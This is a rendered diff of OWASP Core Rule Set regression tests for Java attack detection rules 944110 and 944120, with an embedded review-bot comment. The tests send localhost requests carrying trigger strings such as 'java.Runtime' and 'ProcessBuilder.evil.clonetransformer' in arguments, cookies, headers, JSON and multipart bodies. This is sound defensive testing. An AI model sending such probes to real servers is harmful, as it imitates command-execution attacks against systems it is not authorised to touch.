Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "java.Runtime" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-15 - desc: XML element includes keywords java. and ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944110\"" - - - - test_title: 944110-16 - desc: XML attribute name includes keyworda java. 
and ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944110\"" - - - - test_title: 944110-17 - desc: XML attribute value includes keywords java. and ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-18 - desc: XML element value includes keywords java. and ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "java.ProcessBuilder" - output: - log_contains: "id \"944110\"" +meta: + author: "spartantri" + enabled: true + name: "944110.yaml" + description: "Description" +tests: + - test_title: 944110-1 + desc: Argument test includes keywords java. 
and Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/x-www-form-urlencoded"
+ method: POST
+ version: HTTP/1.0
+ data: "test=java.Runtime"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-2
+ desc: Argument test includes keywords java. and ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ method: POST
+ version: HTTP/1.0
+ data: "test=java.ProcessBuilder"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-3
+ desc: Argument name includes keywords java. and Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ method: POST
+ version: HTTP/1.0
+ data: "java.Runtime=test"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-4
+ desc: Argument name includes keywords java. 
and ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ method: POST
+ version: HTTP/1.0
+ data: "java.ProcessBuilder=test"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-5
+ desc: Cookie test includes keywords java. and Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ Cookie: test=java.Runtime
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-6
+ desc: Cookie test includes keywords java. and ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ Cookie: test=java.ProcessBuilder
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-7
+ desc: Cookie name includes keywords java. 
and Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ Cookie: java.Runtime=test
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-8
+ desc: Cookie name includes keywords java. and ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ Cookie: java.ProcessBuilder=test
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-9
+ desc: Request header test includes keywords java. and Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ test: java.Runtime
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-10
+ desc: Request header test includes keywords java. 
and ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ test: java.ProcessBuilder
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-11
+ desc: XML element includes keywords java. and Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "value"
+ output:
+ no_log_contains: "id \"944110\""
+ - test_title: 944110-12
+ desc: XML attribute name includes keywords java. and Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "element_value"
+ output:
+ no_log_contains: "id \"944110\""
+ - test_title: 944110-13
+ desc: XML attribute value includes keywords java. 
and Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "element_value"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-14
+ desc: XML element value includes keywords java. and Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "java.Runtime"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-15
+ desc: XML element includes keywords java. and ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "value"
+ output:
+ no_log_contains: "id \"944110\""
+ - test_title: 944110-16
+ desc: XML attribute name includes keyworda java. 
and ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "element_value"
+ output:
+ no_log_contains: "id \"944110\""
+ - test_title: 944110-17
+ desc: XML attribute value includes keywords java. and ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "element_value"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-18
+ desc: XML element value includes keywords java. and ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "java.ProcessBuilder"
+ output:
+ log_contains: "id \"944110\""
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml
index 79bbdcd05c..831da6f199 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml
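Review bot: The new `meta:` block at the top of this hunk still carries the placeholder `description: "Description"`, while the neighbouring 944120.yaml in the next hunk has a real one (`"Positive tests for rule 944120"`); since this commit rewrites the whole file it should set `description: "Positive and negative tests for rule 944110 (java. followed by Runtime/ProcessBuilder in arguments, cookies, headers and XML)"` so the file states what it covers. The `desc` of test 944110-16 also carries the typo `keyworda` over from the old side; it should read `desc: XML attribute name includes keywords java. and ProcessBuilder`, matching the wording of 944110-12. The XML bodies of tests 11–18 appear in this rendering as bare `"value"`/`"element_value"`, which looks like the page stripped the markup rather than the patch dropping it, so I have not reviewed those payloads and the `no_log_contains` expectations attached to them. The hunk spans the entire file (old lines 1–426, new lines 1–355), so nothing is cut off at its edges.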
@@ -1,3151 +1,2809 @@ --- - meta: - author: "spartantri" - enabled: true - name: "944120.yaml" - description: "Positive tests for rule 944120" - tests: - - - test_title: 944120-0 - desc: "Argument test includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-1 - desc: "Argument name includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer=test" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-2 - desc: "Cookie test includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.clonetransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-3 - desc: "Cookie name includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.clonetransformer=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-4 - desc: "Request header test includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.clonetransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-5 - desc: "XML element includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-6 - desc: "XML attribute name includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-7 - desc: "XML attribute value includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-8 - desc: "XML element value includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: 
"ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-9 - desc: "Nested XML element value includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-10 - desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-11 - desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": 
\"ProcessBuilder.evil.clonetransformer\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-12 - desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-13 - desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.clonetransformer\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-14 - desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.clonetransformer\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-15 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.clonetransformer\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-16 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.clonetransformer\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - test_title: 944120-17 - desc: "Argument test includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-18 - desc: "Argument name includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure=test" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-19 - desc: "Cookie test includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 
3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.forclosure - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-20 - desc: "Cookie name includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.forclosure=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-21 - desc: "Request header test includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 